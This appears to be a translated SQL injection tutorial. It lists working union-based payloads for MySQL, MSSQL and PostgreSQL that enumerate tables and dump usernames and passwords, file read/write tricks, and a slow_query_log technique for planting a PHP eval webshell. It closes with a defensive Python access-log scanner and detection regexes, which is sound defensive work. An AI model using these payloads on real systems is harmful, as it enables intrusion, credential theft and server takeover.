0x00 Database Introduction
Access: there is no highest-privilege user and no system tables, so it is usually tested by brute-force guessing. Access is standalone: one database corresponds to one website, whereas a MySQL database can usually control multiple websites. Access can also use offset injection.
MySQL, MSSQL, PostgreSQL: these three databases have a highest-privilege user (root, sa, mdb, etc.). MySQL is split by version around 5.0 and exposes different tables depending on the version.
0x01 Basic statements for mysql, mssql and postgresql
mysql reads files: load_file()
union select 1,load_file('d:/1.txt'),3,4,5
mysql writes content to a file: into outfile
union select 1,'shell',3,4,5 into outfile 'd:/1.txt'
To bypass the write restriction, see the previous article. Bypassing secure_file_priv usually requires a page that can execute SQL statements, typically via a SQL command line, phpMyAdmin, etc.
set global slow_query_log=1;
set global slow_query_log_file='<shell path>';
select '<?php eval($_GET[A])?>' or SLEEP(1);
mssql injection
- measure the number of columns:
order by 4
and 1=2 union all select null,null,null,null
- measure the position:
and 1=2 union all select null,1,null,null
and 1=2 union all select null,null,'s',null
- get information:
@@version
get version information
db_name()
current database name
user, system_user, current_user, user_name
get current user name
@@SERVERNAME
get server host information
and 1=2 union all select null,db_name(),null,null
- get table name:
and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null
union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null
- get column names:
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null
- retrieve data:
and 1=2 union all select null,username, password ,null from manage
postgresql statements
- measure the number of columns:
order by 4
and 1=2 union select null,null,null,null
- measure the position: columns 2 and 3 are displayed
and 1=2 union select 'null',null,null,null    error
and 1=2 union select null,'null',null,null    normal
and 1=2 union select null,null,'null',null    normal
and 1=2 union select null,null,null,'null'    error
- get information:
and 1=2 UNION SELECT null,version(),null,null
and 1=2 UNION SELECT null,current_user,null,null
and 1=2 union select null,current_database(),null,null
- Get the database name:
and 1=2 union select null,string_agg(datname,','),null,null from pg_database
- get table name:
1. and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
2. and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables
- get column names:
and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'
- retrieve data:
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users
- supplement - get the DBA (superuser) accounts; under a DBA user it is also possible to read and write files:
and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE
MSSQL and PostgreSQL usually use null as the placeholder when determining the displayed columns; MySQL can use numbers.
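From the defender's side, the statements listed above for all three databases leave recognisable traces in web server access logs. The following is an added example (not part of the original post) that URL-decodes the request target of each log line and tags it with the primitive it matches: MySQL load_file/into outfile and slow_query_log abuse, MSSQL sysobjects/col_name enumeration, PostgreSQL catalog and string_agg enumeration. The log lines are constructed for the example; the signature names are the author's own choice.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the injection primitives listed above. Input is URL-decoded
# first so that %27 or '+' encoding cannot hide a keyword from the match.
SIGNATURES = {
    "mysql_file_read": re.compile(r"\bload_file\s*\(", re.I),
    "mysql_file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "mysql_slowlog_abuse": re.compile(r"\bslow_query_log(?:_file)?\s*=", re.I),
    "mssql_catalog_enum": re.compile(
        r"\bsysobjects\b|\bcol_name\s*\(\s*object_id\s*\(", re.I),
    "pgsql_catalog_enum": re.compile(
        r"\bpg_(?:database|tables|user|stat_user_tables)\b|\bstring_agg\s*\(", re.I),
    "union_probe": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}

# Request target is the token after the method inside the quoted request field.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')


def classify(request_target: str) -> list[str]:
    """Return the signature names that match one URL-decoded request target."""
    decoded = unquote_plus(request_target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (source_ip, tags) for each access-log line that trips a signature."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip it
        tags = classify(m.group(1))
        if tags:
            hits.append((line.split()[0], tags))
    return hits


# Constructed sample access-log lines (not real traffic), modelled on the payloads above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=7 HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1+union+select+1,load_file(%27d:/1.txt%27),3,4,5 HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1+and+1=2+union+all+select+null,(select+top+1+name+from+mozhe_db_v2.dbo.sysobjects+where+xtype=%27u%27),null,null HTTP/1.1" 500',
    '10.0.0.12 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1+and+1=2+union+select+null,string_agg(usename,%27,%27),null,null+FROM+pg_user+WHERE+usesuper+IS+TRUE HTTP/1.1" 200',
    '10.0.0.3 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=union+station HTTP/1.1" 200',
]

if __name__ == "__main__":
    for ip, tags in scan_log(SAMPLE_LOG):
        print(ip, ",".join(tags))
```

The last sample line shows why the union signature requires a following select: a plain search for "union station" is not flagged.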